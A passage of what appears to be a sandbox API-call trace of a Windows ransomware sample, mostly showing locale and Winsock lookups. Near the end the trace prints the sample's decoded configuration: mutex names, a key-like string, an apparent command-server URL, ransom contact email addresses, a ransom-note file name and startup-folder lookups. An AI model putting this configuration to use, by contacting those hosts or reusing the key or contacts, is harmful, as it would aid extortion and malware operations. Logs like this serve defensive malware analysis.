lpProcName="CoSuspendClassObjects") returned 0x767bbb02 [0100.761] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0100.761] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InitializeConditionVariable", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0100.761] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InitializeConditionVariable", cchWideChar=27, lpMultiByteStr=0x136f48c, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="InitializeConditionVariable", lpUsedDefaultChar=0x0) returned 27 [0100.761] GetProcAddress (hModule=0x76910000, lpProcName="InitializeConditionVariable") returned 0x77289981 [0100.761] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeConditionVariable", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0100.761] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeConditionVariable", cchWideChar=21, lpMultiByteStr=0x13682bc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WakeConditionVariable", lpUsedDefaultChar=0x0) returned 21 [0100.761] GetProcAddress (hModule=0x76910000, lpProcName="WakeConditionVariable") returned 0x772d5a7b [0100.761] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeAllConditionVariable", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0100.761] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeAllConditionVariable", cchWideChar=24, lpMultiByteStr=0x136f48c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WakeAllConditionVariable", lpUsedDefaultChar=0x0) returned 24 [0100.761] GetProcAddress (hModule=0x76910000, lpProcName="WakeAllConditionVariable") returned 0x772545a5 [0100.761] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SleepConditionVariableCS", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0100.761] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SleepConditionVariableCS", cchWideChar=24, lpMultiByteStr=0x136f48c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SleepConditionVariableCS", lpUsedDefaultChar=0x0) returned 24 [0100.761] GetProcAddress (hModule=0x76910000, lpProcName="SleepConditionVariableCS") returned 0x769418be [0100.761] GetThreadLocale () returned 0x409 [0100.761] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0100.761] GetCurrentThreadId () returned 0xc44 [0100.761] GetCurrentThreadId () returned 0xc44 [0100.761] GetLocaleInfoW (in: Locale=0x409, LCType=0x100b, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="2") returned 2 [0100.761] GetThreadLocale () returned 0x409 [0100.761] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f0d0, Locale=0x409, Calendar=0x2, CalType=0x4) returned 1 [0100.761] GetThreadLocale () returned 0x409 [0100.761] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f174, Locale=0x409, Calendar=0x2, CalType=0x3) returned 1 [0100.762] GetCurrentThreadId () returned 0xc44 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Sun") returned 4 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x30, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Sunday") returned 7 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Mon") returned 4 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x2a, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Monday") returned 7 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Tue") returned 4 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x2b, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Tuesday") returned 8 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Wed") returned 4 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x2c, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Wednesday") returned 10 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Thu") returned 4 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x2d, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Thursday") returned 9 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Fri") returned 4 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x2e, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Friday") returned 7 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Sat") returned 4 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x2f, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Saturday") returned 9 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x44, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Jan") returned 4 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x38, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="January") returned 8 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x45, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Feb") returned 4 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x39, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="February") returned 9 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x46, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Mar") returned 4 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x3a, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="March") returned 6 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x47, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Apr") returned 4 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x3b, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="April") returned 6 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x48, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="May") returned 4 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x3c, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="May") returned 4 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x49, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Jun") returned 4 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x3d, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="June") returned 5 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x4a, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Jul") returned 4 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x3e, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="July") returned 5 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x4b, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Aug") returned 4 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x3f, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="August") returned 7 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x4c, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Sep") returned 4 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x40, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="September") returned 10 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x4d, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Oct") returned 4 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x41, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="October") returned 8 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x4e, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Nov") returned 4 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x42, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="November") returned 9 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x4f, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Dec") returned 4 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x43, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="December") returned 9 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x14, lpLCData=0x12f820, cchData=256 | out: lpLCData="$") returned 2 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x1b, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x1c, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12fa18, cchData=2 | out: lpLCData=",") returned 2 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12fa18, cchData=2 | out: lpLCData=".") returned 2 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x19, lpLCData=0x12f820, cchData=256 | out: lpLCData="2") returned 2 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12fa18, cchData=2 | out: lpLCData="/") returned 2 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x1f, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="1") returned 2 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x20, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="1") returned 2 [0100.763] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12fa18, cchData=2 | out: lpLCData=":") returned 2 [0100.763] GetLocaleInfoW (in: Locale=0x409, LCType=0x28, lpLCData=0x12f820, cchData=256 | out: lpLCData="AM") returned 3 [0100.763] GetLocaleInfoW (in: Locale=0x409, LCType=0x29, lpLCData=0x12f820, cchData=256 | out: lpLCData="PM") returned 3 [0100.763] GetLocaleInfoW (in: Locale=0x409, LCType=0x25, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0100.763] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0100.763] GetLocaleInfoW (in: Locale=0x409, LCType=0x1005, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0100.763] GetLocaleInfoW (in: Locale=0x409, LCType=0xc, lpLCData=0x12fa18, cchData=2 | out: lpLCData=",") returned 2 [0100.763] LoadLibraryW (lpLibFileName="ws2_32.dll") returned 0x77380000 [0100.764] GetProcAddress (hModule=0x77380000, lpProcName="WSAIoctl") returned 0x77382fe7 [0100.764] GetProcAddress (hModule=0x77380000, lpProcName="__WSAFDIsSet") returned 0x77386a8a [0100.764] GetProcAddress (hModule=0x77380000, lpProcName="closesocket") returned 0x77383918 [0100.764] GetProcAddress (hModule=0x77380000, lpProcName="ioctlsocket") returned 0x77383084 [0100.764] GetProcAddress (hModule=0x77380000, lpProcName="WSAGetLastError") returned 0x773837ad [0100.765] GetProcAddress (hModule=0x77380000, lpProcName="WSAStartup") returned 0x77383ab2 [0100.765] GetProcAddress (hModule=0x77380000, lpProcName="WSACleanup") returned 0x77383c5f [0100.765] GetProcAddress (hModule=0x77380000, lpProcName="accept") returned 0x773868b6 [0100.765] GetProcAddress (hModule=0x77380000, lpProcName="bind") returned 0x77384582 [0100.765] GetProcAddress (hModule=0x77380000, lpProcName="connect") returned 0x77386bdd [0100.765] GetProcAddress (hModule=0x77380000, lpProcName="getpeername") returned 0x77387147 [0100.765] GetProcAddress (hModule=0x77380000, lpProcName="getsockname") returned 0x773830af [0100.765] GetProcAddress (hModule=0x77380000, lpProcName="getsockopt") returned 0x7738737d [0100.765] GetProcAddress (hModule=0x77380000, lpProcName="htonl") returned 0x77382d57 [0100.765] GetProcAddress (hModule=0x77380000, lpProcName="htons") returned 0x77382d8b [0100.765] GetProcAddress (hModule=0x77380000, lpProcName="inet_addr") returned 0x7738311b [0100.765] GetProcAddress (hModule=0x77380000, lpProcName="inet_ntoa") returned 0x7738b131 [0100.765] GetProcAddress (hModule=0x77380000, lpProcName="listen") returned 0x7738b001 [0100.765] GetProcAddress (hModule=0x77380000, lpProcName="ntohl") returned 0x77382d57 [0100.765] GetProcAddress (hModule=0x77380000, lpProcName="ntohs") returned 0x77382d8b [0100.765] GetProcAddress (hModule=0x77380000, lpProcName="recv") returned 0x77386b0e [0100.765] GetProcAddress (hModule=0x77380000, lpProcName="recvfrom") returned 0x7738b6dc [0100.765] GetProcAddress (hModule=0x77380000, lpProcName="select") returned 0x77386989 [0100.766] GetProcAddress (hModule=0x77380000, lpProcName="send") returned 0x77386f01 [0100.766] GetProcAddress (hModule=0x77380000, lpProcName="sendto") returned 0x773834b5 [0100.766] GetProcAddress (hModule=0x77380000, lpProcName="setsockopt") returned 0x773841b6 [0100.766] GetProcAddress (hModule=0x77380000, lpProcName="shutdown") returned 0x7738449d [0100.766] GetProcAddress (hModule=0x77380000, lpProcName="socket") returned 0x77383eb8 [0100.766] GetProcAddress (hModule=0x77380000, lpProcName="gethostbyaddr") returned 0x77396c01 [0100.766] GetProcAddress (hModule=0x77380000, lpProcName="gethostbyname") returned 0x77397673 [0100.766] GetProcAddress (hModule=0x77380000, lpProcName="getprotobyname") returned 0x773968b3 [0100.766] GetProcAddress (hModule=0x77380000, lpProcName="getprotobynumber") returned 0x773967c4 [0100.766] GetProcAddress (hModule=0x77380000, lpProcName="getservbyname") returned 0x77396ef3 [0100.766] GetProcAddress (hModule=0x77380000, lpProcName="getservbyport") returned 0x77396d62 [0100.766] GetProcAddress (hModule=0x77380000, lpProcName="gethostname") returned 0x7738a05b [0100.766] GetProcAddress (hModule=0x77380000, lpProcName="getaddrinfo") returned 0x77384296 [0100.766] GetProcAddress (hModule=0x77380000, lpProcName="freeaddrinfo") returned 0x77384b1b [0100.766] GetProcAddress (hModule=0x77380000, lpProcName="getnameinfo") returned 0x773867b7 [0100.766] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x4e9ec0 | out: lpWSAData=0x4e9ec0) returned 0 [0100.872] GetACP () returned 0x4e4 [0100.872] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12fc28 | out: lpCPInfo=0x12fc28) returned 1 [0100.872] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12fa5c, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\micros~1\\sypykbck.exe")) returned 0x34 [0100.872] GetTickCount () returned 0x241a1 [0100.872] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc38 | out: lpPerformanceCount=0x12fc38*=15766100534) returned 1 [0100.872] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x77\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0100.872] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x59\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0100.872] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x62\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0100.872] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x35\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0100.872] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x57\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0100.872] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x4e\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0100.872] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x4d\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0100.872] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x58\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0100.872] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x43\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0100.872] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x4f\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0100.872] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x50\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0100.872] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x34\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0100.872] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x58\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0100.872] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x4a\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0100.872] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x64\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0100.872] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x6a\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0100.872] LoadStringW (in: hInstance=0x400000, uID=0xff66, lpBuffer=0x12dbd4, cchBufferMax=4096 | out: lpBuffer="32-bit Edition") returned 0xe [0100.872] LoadStringW (in: hInstance=0x400000, uID=0xff65, lpBuffer=0x12dbd0, cchBufferMax=4096 | out: lpBuffer="%s Service Pack %4:d (Version %1:d.%2:d, Build %3:d, %5:s)") returned 0x3a [0100.872] LoadStringW (in: hInstance=0x400000, uID=0xff66, lpBuffer=0x12dbd4, cchBufferMax=4096 | out: lpBuffer="32-bit Edition") returned 0xe [0100.872] LoadStringW (in: hInstance=0x400000, uID=0xff65, lpBuffer=0x12dbd0, cchBufferMax=4096 | out: lpBuffer="%s Service Pack %4:d (Version %1:d.%2:d, Build %3:d, %5:s)") returned 0x3a [0100.872] FindResourceW (hModule=0x400000, lpName="CFG", lpType=0xa) returned 0x51c308 [0100.872] LoadResource (hModule=0x400000, hResInfo=0x51c308) returned 0x50d55c [0100.872] SizeofResource (hModule=0x400000, hResInfo=0x51c308) returned 0xef [0100.872] LockResource (hResData=0x50d55c) returned 0x50d55c [0100.873] FreeResource (hResData=0x50d55c) returned 0 [0100.873] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0100.873] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0100.873] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0100.873] LockResource (hResData=0x50d64c) returned 0x50d64c [0100.873] GetCPInfo (in: CodePage=0xfde9, lpCPInfo=0x12fa3c | out: lpCPInfo=0x12fa3c) returned 1 [0100.873] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1384f60, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0100.873] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1384f60, cbMultiByte=38, lpWideCharStr=0x137de4c, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0100.873] FreeResource (hResData=0x50d64c) returned 0 [0100.873] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0100.873] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x1384f64, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0100.873] GetCurrentThreadId () returned 0xc44 [0100.873] GetCurrentThreadId () returned 0xc44 [0100.873] GetCurrentThreadId () returned 0xc44 [0100.873] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x133cd18, cbMultiByte=239, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 239 [0100.873] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x133cd18, cbMultiByte=239, lpWideCharStr=0x1342e7c, cchWideChar=239 | out: lpWideCharStr="13StarterProcessMutex4\r\n24MainProcessMutex5\r\n35Brother1ProcessMutex6\r\n46Brother2ProcessMutex7\r\n300\r\nCOSLb0cVd9bCx1vp\r\nhttp://statcs.s76.r53.com.ua\r\n131072\r\nbluetablet9643@yahoo.com\r\ndecodedecode@yandex.ru\r\nBl0cked-ReadMe.rtf\r\ndesktop.ini\r\n") returned 239 [0100.873] GetCurrentThreadId () returned 0xc44 [0100.873] GetCurrentThreadId () returned 0xc44 [0100.873] GetCurrentThreadId () returned 0xc44 [0100.873] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\LSfkRHur.exe\" 2" [0100.873] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x133accc, nSize=0x8000 | out: lpDst="C:\\Users\\EEBsYm5") returned 0x11 [0100.873] ExpandEnvironmentStringsW (in: lpSrc="%TEMP%", lpDst=0x133accc, nSize=0x8000 | out: lpDst="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp") returned 0x24 [0100.873] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x133ace4, csidl=26, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 1 [0100.875] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x133ace4, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Local") returned 1 [0100.876] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x133ace4, csidl=7, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 1 [0100.877] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x133ace4, csidl=24, fCreate=0 | out: pszPath="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 1 [0100.877] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x133ace4, csidl=0, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0100.878] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x133ace4, csidl=25, fCreate=0 | out: pszPath="C:\\Users\\Public\\Desktop") returned 1 [0100.879] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x133ace4, csidl=32, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files") returned 1 [0100.879] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x133ace4, csidl=41, fCreate=0 | out: pszPath="C:\\Windows\\system32") returned 1 [0100.880] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x133ace4, csidl=40, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5") returned 1 [0100.882] ExpandEnvironmentStringsW (in: lpSrc="%COMPUTERNAME%", lpDst=0x133accc, nSize=0x8000 | out: lpDst="CRH2YWU7") returned 0x9 [0100.882] ExpandEnvironmentStringsW (in: lpSrc="%USERNAME%", lpDst=0x133accc, nSize=0x8000 | out: lpDst="EEBsYm5") returned 0x8 [0100.882] ExpandEnvironmentStringsW (in: lpSrc="%APPDATA%", lpDst=0x133accc, nSize=0x8000 | out: lpDst="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x21 [0100.882] ExpandEnvironmentStringsW (in: lpSrc="%ALLUSERSPROFILE%", lpDst=0x133accc, nSize=0x8000 | out: lpDst="C:\\ProgramData") returned 0xf [0100.882] FindResourceW (hModule=0x400000, lpName="CMDS", lpType=0xa) returned 0x51c380 [0100.882] LoadResource (hModule=0x400000, hResInfo=0x51c380) returned 0x50d72c [0100.882] SizeofResource (hModule=0x400000, hResInfo=0x51c380) returned 0x582 [0100.882] LockResource (hResData=0x50d72c) returned 0x50d72c [0100.882] FreeResource (hResData=0x50d72c) returned 0 [0100.882] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0100.882] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0100.882] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0100.882] LockResource (hResData=0x50d64c) returned 0x50d64c [0100.882] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1385008, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0100.882] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1385008, cbMultiByte=38, lpWideCharStr=0x137deac, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0100.882] FreeResource (hResData=0x50d64c) returned 0 [0100.882] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, 